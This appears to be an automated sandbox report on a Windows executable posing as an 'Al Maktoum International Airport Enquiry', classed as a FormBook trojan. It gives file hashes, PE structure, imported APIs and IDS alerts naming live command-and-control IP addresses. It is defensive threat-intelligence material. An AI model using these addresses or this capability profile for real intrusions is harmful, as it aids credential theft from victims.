          Number of new started processes analysed: 10
          Number of new started drivers analysed: 0
          Number of existing processes analysed: 0
          Number of existing drivers analysed: 0
          Number of injected processes analysed: 1
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode: default
          Analysis stop reason: Timeout
          Sample name: New Al Maktoum International Airport Enquiry Ref #2401249.exe
          Detection: MAL
          Classification: mal100.troj.evad.winEXE@8/4@14/5
          EGA Information:
          • Successful, ratio: 100%
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 54
          • Number of non-executed functions: 271
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Override analysis time to 240000 for current running targets taking high CPU consumption
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
          • Not all processes were analyzed; the report is missing behavior information
          • Report creation exceeded maximum time and may have missing disassembly code information.
          • Report size exceeded maximum capacity and may have missing disassembly code.
          • Report size getting too big, too many NtEnumerateKey calls found.
          • Report size getting too big, too many NtOpenKey calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          Time | Type | Description
          04:51:39 | API Interceptor | 8479563x Sleep call for process: explorer.exe modified
          04:51:43 | API Interceptor | 8175348x Sleep call for process: msiexec.exe modified
          Process: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe
          File Type: data
          Category: dropped
          Size (bytes): 177486
          Entropy (8bit): 7.968612513184063
          Encrypted: false
          SSDEEP: 3072:Vb/kQrnoFASlCrp5hTARvFTz1qvrvfMl7qnvCxAKY+ggKY8bzAXodzlOnB:Vb542FCGnE7qnvOAKYFgKrSTB
          MD5: 4BE5734C5BC9C6D3EDAC4E8086D8661C
          SHA1: E64E72CDDE760FDBBF8549EF1B97C7F599F73FF4
          SHA-256: CB979460AC541DD55534CDD75B099A72A92D6C5A2CB33AD0350E6FF512AEE259
          SHA-512: 80BAA4A6DC06E94ED215DA0803EE8468DBEABF650530EE5D07B88D633EECBABFC5B6FCE51B6DF2D02960DC893791DA6B7DD736445F68F91C817F1F5CC76CD6AD
          Malicious: false
          Reputation: low
          Process: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe
          File Type: data
          Category: dropped
          Size (bytes): 17282
          Entropy (8bit): 7.866687746537832
          Encrypted: false
          SSDEEP: 384:nYxDxKQgavxWEGd/HqwZgcjMfI0lly5W/nVxhrPdBrROF:YVv/+HhjMDaW/V7bROF
          MD5: 7B522584E4C7DB09E2A87721052645E8
          SHA1: 12C1B3E96939AD716168161009874FD1A44DA410
          SHA-256: 23267CA907D99A86809B8288A20A1901FD5EBDC5E05BD9BAE4DC1B93DA0BBE4B
          SHA-512: 605C09054A924CA2501926C31BCDF2A5771591CC68B7BF59B0FED1F05241DDDC34549022BD45C413B8A11DA29D86DE55BC50EFA11346539EEDD3C440666C0D1F
          Malicious: false
          Reputation: low
          Process: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe
          File Type: International EBCDIC text, with very long lines (57121), with no line terminators
          Category: dropped
          Size (bytes): 57121
          Entropy (8bit): 4.975182112181778
          Encrypted: false
          SSDEEP: 768:4anY1tcSOCa+j4FvOU1xQIh7GZbfGH0e9Ad0l:UPzOy+OUzIZbfGvl
          MD5: 79B6F047E29CBEEC870695936784CC83
          SHA1: 8BA9B8476E9DE9B036856C0E7B9381789183FC56
          SHA-256: E2A5BEA85DC72CE6A91A9A1E7833ABC75EC914B10618FB427D6DDB6B8A715B2D
          SHA-512: 455028DAA15BC532CDE2B32B93BEE11475956C91CF9A6C9A492018D2C97D29E57C04B890B8C483DA2C1D930EA641DD57D35D90D60AC52B719FB396146ABE16FC
          Malicious: false
          Reputation: low
          Process: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe
          File Type: data
          Category: dropped
          Size (bytes): 189440
          Entropy (8bit): 7.822314845763124
          Encrypted: false
          SSDEEP: 3072:azsrW1HrukemVwHyQLrOHj7pyxPGC4j8bV36lgOpTS3EOtlQwHKppi11T4CNItia:azdBrtKk7iG54V3y3+Rt6tH8NDrr8Q3A
          MD5: B54BFF163AD5835BBD403A4EC6B2FCA2
          SHA1: C7D3171F55C5597973132B0090F29846B545EAC7
          SHA-256: 6F3F3C747A7C4993A772E610CEF4D73989562BFA4C418C4DE84602C3DEA21709
          SHA-512: C55576A812790A4BDD3B14C6097228AA14185068F9641F0FC4C77DD11D287BD7AF60E099E0F4AB618336A94DF15F392577BFD6A66CB12F68E8E6D55641D535C0
          Malicious: false
          Reputation: low
          File type: PE32 executable (GUI) Intel 80386, for MS Windows
          Entropy (8bit): 7.057895235347342
          TrID:
          • Win32 Executable (generic) a (10002005/4) 99.96%
          • Generic Win/DOS Executable (2004/3) 0.02%
          • DOS Executable Generic (2002/1) 0.02%
          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
          File name: New Al Maktoum International Airport Enquiry Ref #2401249.exe
          File size: 1'120'768 bytes
          MD5: 621c253a4d715e3af16fe8be2fdd8cb1
          SHA1: 68ce09cc59887c7f9649f22e6688028957d6c55e
          SHA256: 007c997b49ac0889e71757762c82432a975a273eda4c871acec3c0823c6ea530
          SHA512: 56616c4175b53f6b00591e7aa5d32146fb168de7a22501c9fd784a0ccc5d403b5b920f01f3545cceab9ea0dd0cc5df992d339bed6a838e930094f35782bc4fa6
          SSDEEP: 24576:TAHnh+eWsN3skA4RV1Hom2KXMmHaIxs0ZkXe9VHdA5:eh+ZkldoPK8YaIxIe9O
          TLSH: 3935AD0273D2C036FFAB92739B6AF24556BC79254123852F13981DB9BD701B2227E763
          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..
          Icon Hash:aaf3e3e3938382a0
          Entrypoint:0x42800a
          Entrypoint Section:.text
          Digitally signed:false
          Imagebase:0x400000
          Subsystem:windows gui
          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
          Time Stamp:0x66CD4725 [Tue Aug 27 03:25:25 2024 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:5
          OS Version Minor:1
          File Version Major:5
          File Version Minor:1
          Subsystem Version Major:5
          Subsystem Version Minor:1
          Import Hash:afcdf79be1557326c854b6e20cb900a7
          Instruction
          call 00007FE89480E5ADh
          jmp 00007FE894801364h
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          push edi
          push esi
          mov esi, dword ptr [esp+10h]
          mov ecx, dword ptr [esp+14h]
          mov edi, dword ptr [esp+0Ch]
          mov eax, ecx
          mov edx, ecx
          add eax, esi
          cmp edi, esi
          jbe 00007FE8948014EAh
          cmp edi, eax
          jc 00007FE89480184Eh
          bt dword ptr [004C41FCh], 01h
          jnc 00007FE8948014E9h
          rep movsb
          jmp 00007FE8948017FCh
          cmp ecx, 00000080h
          jc 00007FE8948016B4h
          mov eax, edi
          xor eax, esi
          test eax, 0000000Fh
          jne 00007FE8948014F0h
          bt dword ptr [004BF324h], 01h
          jc 00007FE8948019C0h
          bt dword ptr [004C41FCh], 00000000h
          jnc 00007FE89480168Dh
          test edi, 00000003h
          jne 00007FE89480169Eh
          test esi, 00000003h
          jne 00007FE89480167Dh
          bt edi, 02h
          jnc 00007FE8948014EFh
          mov eax, dword ptr [esi]
          sub ecx, 04h
          lea esi, dword ptr [esi+04h]
          mov dword ptr [edi], eax
          lea edi, dword ptr [edi+04h]
          bt edi, 03h
          jnc 00007FE8948014F3h
          movq xmm1, qword ptr [esi]
          sub ecx, 08h
          lea esi, dword ptr [esi+08h]
          movq qword ptr [edi], xmm1
          lea edi, dword ptr [edi+08h]
          test esi, 00000007h
          je 00007FE894801545h
          bt esi, 03h
          Programming Language:
          • [ASM] VS2013 build 21005
          • [ C ] VS2013 build 21005
          • [C++] VS2013 build 21005
          • [ C ] VS2008 SP1 build 30729
          • [IMP] VS2008 SP1 build 30729
          • [ASM] VS2013 UPD5 build 40629
          • [RES] VS2013 build 21005
          • [LNK] VS2013 UPD5 build 40629
          Name | Virtual Address | Virtual Size | Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | 
          IMAGE_DIRECTORY_ENTRY_IMPORT | 0xbc0cc | 0x17c | .rdata
          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc8000 | 0x47238 | .rsrc
          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | 
          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | 
          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x110000 | 0x7134 | .reloc
          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | 
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | 
          IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | 
          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4b50 | 0x40 | .rdata
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | 
          IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | 
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | 
          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | 
          Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
          .text | 0x1000 | 0x8dfdd | 0x8e000 | 310e36668512d53489c005622bb1b4a9 | False | 0.5735602580325704 | data | 6.675248351711057 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          .rdata | 0x8f000 | 0x2fd8e | 0x2fe00 | 748cf1ab2605ce1fd72d53d912abb68f | False | 0.32828818537859006 | data | 5.763244005758284 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .data | 0xbf000 | 0x8f74 | 0x5200 | aae9601d920f07080bdfadf43dfeff12 | False | 0.1017530487804878 | data | 1.1963819235530628 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          .rsrc | 0xc8000 | 0x47238 | 0x47400 | f59eb3c128183326e45be13d8a8890a1 | False | 0.9069764254385965 | data | 7.847645808433948 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .reloc | 0x110000 | 0x7134 | 0x7200 | f04128ad0f87f42830e4a6cdbc38c719 | False | 0.7617530153508771 | data | 6.783955557128661 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
          Name | RVA | Size | Type | Language | Country | ZLIB Complexity
          RT_ICON | 0xc85a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
          RT_ICON | 0xc86d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
          RT_ICON | 0xc87f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
          RT_ICON | 0xc8920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
          RT_ICON | 0xc8c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
          RT_ICON | 0xc8d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
          RT_ICON | 0xc9bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
          RT_ICON | 0xca480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
          RT_ICON | 0xca9e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
          RT_ICON | 0xccf90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
          RT_ICON | 0xce038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
          RT_MENU | 0xce4a0 | 0x50 | data | English | Great Britain | 0.9
          RT_STRING | 0xce4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
          RT_STRING | 0xcea84 | 0x68a | data | English | Great Britain | 0.2747909199522103
          RT_STRING | 0xcf110 | 0x490 | data | English | Great Britain | 0.3715753424657534
          RT_STRING | 0xcf5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
          RT_STRING | 0xcfb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
          RT_STRING | 0xd01f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
          RT_STRING | 0xd0660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
          RT_RCDATA | 0xd07b8 | 0x3e4ce | data |  |  | 1.0003370143662171
          RT_GROUP_ICON | 0x10ec88 | 0x76 | data | English | Great Britain | 0.6610169491525424
          RT_GROUP_ICON | 0x10ed00 | 0x14 | data | English | Great Britain | 1.25
          RT_GROUP_ICON | 0x10ed14 | 0x14 | data | English | Great Britain | 1.15
          RT_GROUP_ICON | 0x10ed28 | 0x14 | data | English | Great Britain | 1.25
          RT_VERSION | 0x10ed3c | 0x10c | data | English | Great Britain | 0.5932835820895522
          RT_MANIFEST | 0x10ee48 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
          DLL | Import
          WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
          VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
          WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
          COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
          MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
          WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
          PSAPI.DLL | GetProcessMemoryInfo
          IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
          USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
          UxTheme.dll | IsThemeActive
          KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
          USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
          GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
          COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
          ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
          SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
          ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
          OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
          Language of compilation system | Country where language is spoken | Map
          English | Great Britain | 
          Timestamp | Protocol | SID | Signature | Severity | Source Port | Dest Port | Source IP | Dest IP
          2024-08-27T10:51:57.291670+0200 | TCP | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 49737 | 80 | 192.168.2.4 | 104.18.24.121
          2024-08-27T10:51:57.291670+0200 | TCP | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 49737 | 80 | 192.168.2.4 | 104.18.24.121
          2024-08-27T10:51:57.291670+0200 | TCP | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 49737 | 80 | 192.168.2.4 | 104.18.24.121
          2024-08-27T10:53:20.668970+0200 | TCP | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 49738 | 80 | 192.168.2.4 | 103.235.46.96
          2024-08-27T10:53:20.668970+0200 | TCP | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 49738 | 80 | 192.168.2.4 | 103.235.46.96
          2024-08-27T10:53:20.668970+0200 | TCP | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 49738 | 80 | 192.168.2.4 | 103.235.46.96
          2024-08-27T10:50:53.816844+0200 | TCP | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 49739 | 80 | 192.168.2.4 | 76.223.105.230
          2024-08-27T10:50:53.816844+0200 | TCP | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 49739 | 80 | 192.168.2.4 | 76.223.105.230
          2024-08-27T10:50:53.816844+0200 | TCP | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 49739 | 80 | 192.168.2.4 | 76.223.105.230
          2024-08-27T10:54:21.642054+0200 | TCP | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 49741 | 80 | 192.168.2.4 | 104.18.23.89
          2024-08-27T10:54:21.642054+0200 | TCP | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 49741 | 80 | 192.168.2.4 | 104.18.23.89
          2024-08-27T10:54:21.642054+0200 | TCP | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 49741 | 80 | 192.168.2.4 | 104.18.23.89
          2024-08-27T10:54:01.377326+0200 | TCP | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 49740 | 80 | 192.168.2.4 | 103.224.212.214
          2024-08-27T10:54:01.377326+0200 | TCP | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 49740 | 80 | 192.168.2.4 | 103.224.212.214
          2024-08-27T10:54:01.377326+0200 | TCP | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 49740 | 80 | 192.168.2.4 | 103.224.212.214
          Timestamp | Source Port | Dest Port | Source IP | Dest IP
          Aug 27, 2024 10:51:56.787992954 CEST | 49737 | 80 | 192.168.2.4 | 104.18.24.121
          Aug 27, 2024 10:51:56.792905092 CEST | 80 | 49737 | 104.18.24.121 | 192.168.2.4
          Aug 27, 2024 10:51:56.792974949 CEST | 49737 | 80 | 192.168.2.4 | 104.18.24.121
          Aug 27, 2024 10:51:56.793009996 CEST | 49737 | 80 | 192.168.2.4 | 104.18.24.121
          Aug 27, 2024 10:51:56.797885895 CEST | 80 | 49737 | 104.18.24.121 | 192.168.2.4
          Aug 27, 2024 10:51:57.285860062 CEST | 49737 | 80 | 192.168.2.4 | 104.18.24.121
          Aug 27, 2024 10:51:57.291254997 CEST | 80 | 49737 | 104.18.24.121 | 192.168.2.4
          Aug 27, 2024 10:51:57.291670084 CEST | 49737 | 80 | 192.168.2.4 | 104.18.24.121
          Aug 27, 2024 10:53:20.093580008 CEST | 49738 | 80 | 192.168.2.4 | 103.235.46.96
          Aug 27, 2024 10:53:20.098499060 CEST | 80 | 49738 | 103.235.46.96 | 192.168.2.4
          Aug 27, 2024 10:53:20.098558903 CEST | 49738 | 80 | 192.168.2.4 | 103.235.46.96
          Aug 27, 2024 10:53:20.098675966 CEST | 49738 | 80 | 192.168.2.4 | 103.235.46.96
          Aug 27, 2024 10:53:20.103538036 CEST | 80 | 49738 | 103.235.46.96 | 192.168.2.4
          Aug 27, 2024 10:53:20.598337889 CEST | 49738 | 80 | 192.168.2.4 | 103.235.46.96
          Aug 27, 2024 10:53:20.645245075 CEST | 80 | 49738 | 103.235.46.96 | 192.168.2.4
          Aug 27, 2024 10:53:20.663753986 CEST | 80 | 49738 | 103.235.46.96 | 192.168.2.4
          Aug 27, 2024 10:53:20.668970108 CEST | 49738 | 80 | 192.168.2.4 | 103.235.46.96
          Aug 27, 2024 10:53:39.702976942 CEST | 49739 | 80 | 192.168.2.4 | 76.223.105.230
          Aug 27, 2024 10:53:39.707993031 CEST | 80 | 49739 | 76.223.105.230 | 192.168.2.4
          Aug 27, 2024 10:53:39.708056927 CEST | 49739 | 80 | 192.168.2.4 | 76.223.105.230
          Aug 27, 2024 10:53:39.708156109 CEST | 49739 | 80 | 192.168.2.4 | 76.223.105.230
          Aug 27, 2024 10:53:39.712901115 CEST | 80 | 49739 | 76.223.105.230 | 192.168.2.4
          Aug 27, 2024 10:53:40.200354099 CEST | 80 | 49739 | 76.223.105.230 | 192.168.2.4
          Aug 27, 2024 10:53:40.200377941 CEST | 80 | 49739 | 76.223.105.230 | 192.168.2.4
          Aug 27, 2024 10:53:40.200530052 CEST | 49739 | 80 | 192.168.2.4 | 76.223.105.230
